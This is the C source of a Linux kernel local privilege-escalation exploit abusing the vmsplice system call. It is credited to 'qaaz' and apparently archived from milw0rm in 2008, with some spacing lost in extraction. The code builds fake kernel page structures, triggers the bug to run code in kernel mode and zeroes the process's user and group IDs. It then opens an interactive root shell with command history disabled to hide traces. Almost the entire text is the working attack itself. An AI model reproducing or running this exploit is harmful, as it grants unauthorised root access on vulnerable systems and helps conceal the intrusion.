linux local root exploit,Linux vmsplice Local Root Exploit

#define __KERNEL__

#include #define PIPE_BUFFERS16

#define PG_compound14

#define uintunsigned int

#define static_inlinestatic inline __attribute__((always_inline))

#define STACK(x)(x + sizeof(x) - 40)

struct page {

unsigned long flags;

int count;

int mapcount;

unsigned long private;

void *mapping;

unsigned long index;

struct { long next, prev; } lru;

};

voidexit_code();

charexit_stack[1024 * 1024];

voiddie(char *msg, int err)

{

printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));

fflush(stdout);

fflush(stderr);

exit(1);

}

#if defined (__i386__)

#ifndef __NR_vmsplice

#define __NR_vmsplice316

#endif

#define USER_CS0x73

#define USER_SS0x7b

#define USER_FL0x246

static_inline

voidexit_kernel()

{

__asm__ __volatile__ (

"movl %0, 0x10(%%esp) ;"

"movl %1, 0x0c(%%esp) ;"

"movl %2, 0x08(%%esp) ;"

"movl %3, 0x04(%%esp) ;"

"movl %4, 0x00(%%esp) ;"

"iret"

: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),

"i" (USER_CS), "r" (exit_code)

);

}

static_inline

void *get_current()

{

unsigned long curr;

__asm__ __volatile__ (

"movl %%esp, %%eax ;"

"andl %1, %%eax ;"

"movl (%%eax), %0"

: "=r" (curr)

: "i" (~8191)

);

return (void *) curr;

}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice

#define __NR_vmsplice278

#endif

#define USER_CS0x23

#define USER_SS0x2b

#define USER_FL0x246

static_inline

voidexit_kernel()

{

__asm__ __volatile__ (

"swapgs ;"

"movq %0, 0x20(%%rsp) ;"

"movq %1, 0x18(%%rsp) ;"

"movq %2, 0x10(%%rsp) ;"

"movq %3, 0x08(%%rsp) ;"

"movq %4, 0x00(%%rsp) ;"

"iretq"

: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),

"i" (USER_CS), "r" (exit_code)

);

}

static_inline

void *get_current()

{

unsigned long curr;

__asm__ __volatile__ (

"movq %%gs:(0), %0"

: "=r" (curr)

);

return (void *) curr;

}

#else

#error "unsupported arch"

#endif

#if defined (_syscall4)

#define __NR__vmsplice__NR_vmsplice

_syscall4(

long, _vmsplice,

int, fd,

struct iovec *, iov,

unsigned long, nr_segs,

unsigned int, flags)

#else

#define _vmsplice(fd,io,nr,fl)syscall(__NR_vmsplice, (fd), (io), (nr), (fl))

#endif

static uint uid, gid;

voidkernel_code()

{

inti;

uint*p = get_current();

for (i = 0; i < 1024-13; i++) {

if (p[0] == uid && p[1] == uid &&

p[2] == uid && p[3] == uid &&

p[4] == gid && p[5] == gid &&

p[6] == gid && p[7] == gid) {

p[0] = p[1] = p[2] = p[3] = 0;

p[4] = p[5] = p[6] = p[7] = 0;

p = (uint *) ((char *)(p + 8) + sizeof(void *));

p[0] = p[1] = p[2] = ~0;

break;

}

p++;

}

exit_kernel();

}

voidexit_code()

{

if (getuid() != 0)

die("wtf", 0);

printf("[+] root\n");

putenv("HISTFILE=/dev/null");

execl("/bin/bash", "bash", "-i", NULL);

die("/bin/bash", errno);

}

intmain(int argc, char *argv[])

{

intpi[2];

size_tmap_size;

char *map_addr;

struct ioveciov;

struct page *pages[5];

uid = getuid();

gid = getgid();

setresuid(uid, uid, uid);

setresgid(gid, gid, gid);

printf("-----------------------------------\n");

printf(" Linux vmsplice Local Root Exploit\n");

printf(" By qaaz\n");

printf("-----------------------------------\n");

if (!uid || !gid)

die("!@#$", 0);

/*****/

pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};

pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;

map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);

printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

printf("[+] page: 0x%lx\n", pages[0]);

printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;

pages[0]->private = (unsigned long) pages[0];

pages[0]->count = 1;

pages[1]->lru.next = (long) kernel_code;

/*****/

pages[2] = *(void **) pages[0];

pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;

map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);

printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

printf("[+] page: 0x%lx\n", pages[2]);

printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;

pages[2]->private = (unsigned long) pages[2];

pages[2]->count = 1;

pages[3]->lru.next = (long) kernel_code;

/*****/

pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};

map_size = PAGE_SIZE;

map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,

MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);

printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

printf("[+] page: 0x%lx\n", pages[4]);

/*****/

map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;

map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,

MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);

if (map_addr == MAP_FAILED)

die("mmap", errno);

memset(map_addr, 0, map_size);

printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/

map_size -= 2 * PAGE_SIZE;

if (munmap(map_addr + map_size, PAGE_SIZE) < 0)

die("munmap", errno);

/*****/

if (pipe(pi) < 0) die("pipe", errno);

close(pi[0]);

iov.iov_base = map_addr;

iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);

_vmsplice(pi[1], &iov, 1, 0);

die("vmsplice", errno);

return 0;

}

// milw0rm.com [2008-02-09]